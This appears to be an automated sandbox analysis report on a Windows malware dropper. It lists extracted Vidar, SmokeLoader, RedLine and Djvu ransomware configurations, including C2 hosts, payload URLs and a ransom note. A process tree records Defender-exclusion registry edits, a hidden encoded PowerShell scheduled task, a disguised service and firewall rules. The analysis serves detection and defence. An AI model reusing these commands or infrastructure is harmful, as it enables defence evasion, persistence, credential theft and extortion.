Analysis

  • max time kernel
    140s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220310-en
  • submitted
    14-03-2022 05:30

General

  • Target

    ce511d7b99f138303a1a4485a2966fd1e95a13644da71f1bb71be5e13c4887cd.exe

  • Size

    3.0MB

  • MD5

    001f9fe2680a3c4d81991cfe0a236248

  • SHA1

    c7ab2b6f096851d0966f0981a1c1765342df001f

  • SHA256

    ce511d7b99f138303a1a4485a2966fd1e95a13644da71f1bb71be5e13c4887cd

  • SHA512

    dbf3890b16d67b8d91c11697cbf5e785d3983189132c4eb9399994e3246a17d5b1be50891604d522b306b1e77e67243ebf7b339e14bdde1bc96599d42c721560

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

ruzki12_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    c51ddc8008e8581a01cec6e8291c5530

Extracted

Family

redline

Botnet

pizzadlyashekera

C2

65.108.101.231:14648

Attributes
  • auth_value

    7d6b3cb15fc835e113d8c22bd7cfe2b4

Extracted

Family

redline

Botnet

Installs

C2

94.23.1.92:12857

Attributes
  • auth_value

    c8e146507a5c0004dfcc77a7c5f15bc2

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

@ywqmre

C2

185.215.113.24:15994

Attributes
  • auth_value

    5a482aa0be2b5e01649fe7a3ce943422

Extracted

Family

redline

Botnet

ruz876

C2

185.215.113.7:5186

Attributes
  • auth_value

    4750f6742a496bbe74a981d51e7680ad

Signatures

  • Detected Djvu ransomware 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Danabot Key Exchange Request

    suricata: ET MALWARE Danabot Key Exchange Request

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

    suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

  • suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

    suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 8 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 37 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 11 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 19 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 25 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 52 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ce511d7b99f138303a1a4485a2966fd1e95a13644da71f1bb71be5e13c4887cd.exe
    "C:\Users\Admin\AppData\Local\Temp\ce511d7b99f138303a1a4485a2966fd1e95a13644da71f1bb71be5e13c4887cd.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5076
    • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2884
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sonia_1.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2260
        • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_1.exe
          sonia_1.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1208
          • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_1.exe
            "C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_1.exe" -a
            5⤵
            • Executes dropped EXE
            PID:2940
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sonia_7.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4320
        • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_7.exe
          sonia_7.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4632
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sonia_6.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4284
        • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_6.exe
          sonia_6.exe
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:4408
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            PID:4152
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:4376
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sonia_5.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1780
        • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_5.exe
          sonia_5.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1340
          • C:\Users\Admin\Documents\9JT6Xd9pRCut_J0eDWBTTgqo.exe
            "C:\Users\Admin\Documents\9JT6Xd9pRCut_J0eDWBTTgqo.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            PID:3172
          • C:\Users\Admin\Documents\fNfDAzXGPhfy7e6BuSUZNZyg.exe
            "C:\Users\Admin\Documents\fNfDAzXGPhfy7e6BuSUZNZyg.exe"
            5⤵
              PID:4056
              • C:\Users\Admin\Documents\fNfDAzXGPhfy7e6BuSUZNZyg.exe
                "C:\Users\Admin\Documents\fNfDAzXGPhfy7e6BuSUZNZyg.exe"
                6⤵
                • Executes dropped EXE
                PID:1664
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 536
                  7⤵
                  • Program crash
                  PID:1984
            • C:\Users\Admin\Documents\rjaNS7pDYOL0V3UFJ0qO5dJH.exe
              "C:\Users\Admin\Documents\rjaNS7pDYOL0V3UFJ0qO5dJH.exe"
              5⤵
              • Executes dropped EXE
              • Checks computer location settings
              PID:4836
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 624
                6⤵
                • Program crash
                PID:2600
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 632
                6⤵
                • Program crash
                PID:3180
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 660
                6⤵
                • Program crash
                PID:3648
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 724
                6⤵
                • Program crash
                PID:212
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1252
                6⤵
                • Program crash
                PID:740
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1260
                6⤵
                • Program crash
                PID:4204
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1276
                6⤵
                • Program crash
                PID:5000
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1216
                6⤵
                • Program crash
                PID:4988
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im "rjaNS7pDYOL0V3UFJ0qO5dJH.exe" /f & erase "C:\Users\Admin\Documents\rjaNS7pDYOL0V3UFJ0qO5dJH.exe" & exit
                6⤵
                  PID:4544
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im "rjaNS7pDYOL0V3UFJ0qO5dJH.exe" /f
                    7⤵
                    • Kills process with taskkill
                    PID:740
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1104
                  6⤵
                  • Program crash
                  PID:1364
              • C:\Users\Admin\Documents\1FaOTMPz0PtuyWvAYi_Ow1Vd.exe
                "C:\Users\Admin\Documents\1FaOTMPz0PtuyWvAYi_Ow1Vd.exe"
                5⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Suspicious use of AdjustPrivilegeToken
                PID:4840
                • C:\Users\Admin\AppData\Local\Temp\0907b054-7a99-4a6d-928d-3af850ba787a.exe
                  "C:\Users\Admin\AppData\Local\Temp\0907b054-7a99-4a6d-928d-3af850ba787a.exe"
                  6⤵
                  • Executes dropped EXE
                  • Checks processor information in registry
                  PID:2468
              • C:\Users\Admin\Documents\dzHI5XHSCXy4cnXu6E0zqm92.exe
                "C:\Users\Admin\Documents\dzHI5XHSCXy4cnXu6E0zqm92.exe"
                5⤵
                • Executes dropped EXE
                PID:2268
              • C:\Users\Admin\Documents\Gy8Snbef45qA_zrKPvJaPv5V.exe
                "C:\Users\Admin\Documents\Gy8Snbef45qA_zrKPvJaPv5V.exe"
                5⤵
                • Executes dropped EXE
                PID:4532
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 432
                  6⤵
                  • Program crash
                  PID:3216
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 440
                  6⤵
                  • Program crash
                  PID:5028
              • C:\Users\Admin\Documents\eCugTTgAdNkThnexXPAesZDz.exe
                "C:\Users\Admin\Documents\eCugTTgAdNkThnexXPAesZDz.exe"
                5⤵
                • Executes dropped EXE
                PID:2412
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 932
                  6⤵
                  • Program crash
                  PID:2392
              • C:\Users\Admin\Documents\lH2tnIu0e8Lqk90JnBIsy5i6.exe
                "C:\Users\Admin\Documents\lH2tnIu0e8Lqk90JnBIsy5i6.exe"
                5⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Loads dropped DLL
                • Checks processor information in registry
                PID:3084
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im lH2tnIu0e8Lqk90JnBIsy5i6.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\lH2tnIu0e8Lqk90JnBIsy5i6.exe" & del C:\ProgramData\*.dll & exit
                  6⤵
                    PID:3768
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im lH2tnIu0e8Lqk90JnBIsy5i6.exe /f
                      7⤵
                      • Kills process with taskkill
                      PID:2644
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      7⤵
                      • Delays execution with timeout.exe
                      PID:2540
                • C:\Users\Admin\Documents\se6pDq8U1NXzdgBFn4M7QLNz.exe
                  "C:\Users\Admin\Documents\se6pDq8U1NXzdgBFn4M7QLNz.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:2216
                  • C:\Users\Admin\AppData\Local\Temp\7zSB1B5.tmp\Install.exe
                    .\Install.exe
                    6⤵
                    • Executes dropped EXE
                    PID:3740
                    • C:\Users\Admin\AppData\Local\Temp\7zSC471.tmp\Install.exe
                      .\Install.exe /S /site_id "525403"
                      7⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks computer location settings
                      • Drops file in System32 directory
                      • Enumerates system info in registry
                      PID:4972
                      • C:\Windows\SysWOW64\forfiles.exe
                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                        8⤵
                          PID:3772
                          • C:\Windows\SysWOW64\cmd.exe
                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                            9⤵
                              PID:676
                              • \??\c:\windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                10⤵
                                  PID:4484
                                • \??\c:\windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                  10⤵
                                    PID:1288
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                8⤵
                                  PID:1708
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                    9⤵
                                      PID:1988
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                        10⤵
                                          PID:3128
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                          10⤵
                                            PID:3524
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "geGvcdbZo" /SC once /ST 00:21:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                        8⤵
                                        • Creates scheduled task(s)
                                        PID:3360
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn "geGvcdbZo"
                                        8⤵
                                          PID:5008
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /DELETE /F /TN "geGvcdbZo"
                                          8⤵
                                            PID:2032
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 06:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\uzVYYfB.exe\" j6 /site_id 525403 /S" /V1 /F
                                            8⤵
                                            • Creates scheduled task(s)
                                            PID:3048
                                    • C:\Users\Admin\Documents\bGlGMLKVwjzKzqA87lYHeg6g.exe
                                      "C:\Users\Admin\Documents\bGlGMLKVwjzKzqA87lYHeg6g.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      PID:2724
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\bGlGMLKVwjzKzqA87lYHeg6g.exe
                                        6⤵
                                          PID:1984
                                          • C:\Windows\system32\choice.exe
                                            choice /C Y /N /D Y /T 0
                                            7⤵
                                              PID:1460
                                        • C:\Users\Admin\Documents\GcEd2pfcChMQfR7OPSuyw1hh.exe
                                          "C:\Users\Admin\Documents\GcEd2pfcChMQfR7OPSuyw1hh.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2180
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c timeout 45
                                            6⤵
                                              PID:1288
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout 45
                                                7⤵
                                                • Delays execution with timeout.exe
                                                PID:5092
                                          • C:\Users\Admin\Documents\HIfbHs5NRdKt9UBEo92e1qpS.exe
                                            "C:\Users\Admin\Documents\HIfbHs5NRdKt9UBEo92e1qpS.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            • Adds Run key to start application
                                            PID:396
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\iqzmzqsb\
                                              6⤵
                                                PID:1752
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hcrnhjhc.exe" C:\Windows\SysWOW64\iqzmzqsb\
                                                6⤵
                                                  PID:448
                                                • C:\Windows\SysWOW64\sc.exe
                                                  "C:\Windows\System32\sc.exe" create iqzmzqsb binPath= "C:\Windows\SysWOW64\iqzmzqsb\hcrnhjhc.exe /d\"C:\Users\Admin\Documents\HIfbHs5NRdKt9UBEo92e1qpS.exe\"" type= own start= auto DisplayName= "wifi support"
                                                  6⤵
                                                    PID:3048
                                                  • C:\Windows\SysWOW64\sc.exe
                                                    "C:\Windows\System32\sc.exe" description iqzmzqsb "wifi internet conection"
                                                    6⤵
                                                      PID:2208
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      "C:\Windows\System32\sc.exe" start iqzmzqsb
                                                      6⤵
                                                        PID:3796
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:4056
                                                      • C:\Windows\SysWOW64\netsh.exe
                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                        6⤵
                                                          PID:320
                                                        • C:\Users\Admin\cplnkopw.exe
                                                          "C:\Users\Admin\cplnkopw.exe" /d"C:\Users\Admin\Documents\HIfbHs5NRdKt9UBEo92e1qpS.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Checks computer location settings
                                                          PID:4996
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\pupomqih.exe" C:\Windows\SysWOW64\iqzmzqsb\
                                                            7⤵
                                                            • Blocklisted process makes network request
                                                            • Loads dropped DLL
                                                            • Checks processor information in registry
                                                            PID:2268
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "C:\Windows\System32\sc.exe" config iqzmzqsb binPath= "C:\Windows\SysWOW64\iqzmzqsb\pupomqih.exe /d\"C:\Users\Admin\cplnkopw.exe\""
                                                            7⤵
                                                              PID:3596
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "C:\Windows\System32\sc.exe" start iqzmzqsb
                                                              7⤵
                                                                PID:4596
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                7⤵
                                                                  PID:3752
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 1256
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:4984
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 1048
                                                                6⤵
                                                                • Program crash
                                                                PID:1052
                                                            • C:\Users\Admin\Documents\FC2oiagNW4aAvXpkdU3YCi08.exe
                                                              "C:\Users\Admin\Documents\FC2oiagNW4aAvXpkdU3YCi08.exe"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of SetThreadContext
                                                              PID:3724
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                6⤵
                                                                  PID:2492
                                                              • C:\Users\Admin\Documents\yq4uZCUAdVGBMiGj7aYv1vNP.exe
                                                                "C:\Users\Admin\Documents\yq4uZCUAdVGBMiGj7aYv1vNP.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Checks BIOS information in registry
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of SetThreadContext
                                                                PID:3736
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                  6⤵
                                                                    PID:5016
                                                                • C:\Users\Admin\Documents\91GY7H5KQ718XH2rdkpjkPlX.exe
                                                                  "C:\Users\Admin\Documents\91GY7H5KQ718XH2rdkpjkPlX.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:3660
                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                    6⤵
                                                                      PID:4848
                                                                  • C:\Users\Admin\Documents\u073T_paBi1bbf7X3uEch1hG.exe
                                                                    "C:\Users\Admin\Documents\u073T_paBi1bbf7X3uEch1hG.exe"
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    • Checks processor information in registry
                                                                    PID:1272
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                      6⤵
                                                                      • Blocklisted process makes network request
                                                                      PID:2264
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 644
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:2996
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 948
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:3820
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 880
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:3728
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 1028
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:4044
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                      6⤵
                                                                      • Blocklisted process makes network request
                                                                      • Checks processor information in registry
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:400
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 880
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:4808
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 672
                                                                      6⤵
                                                                      • Program crash
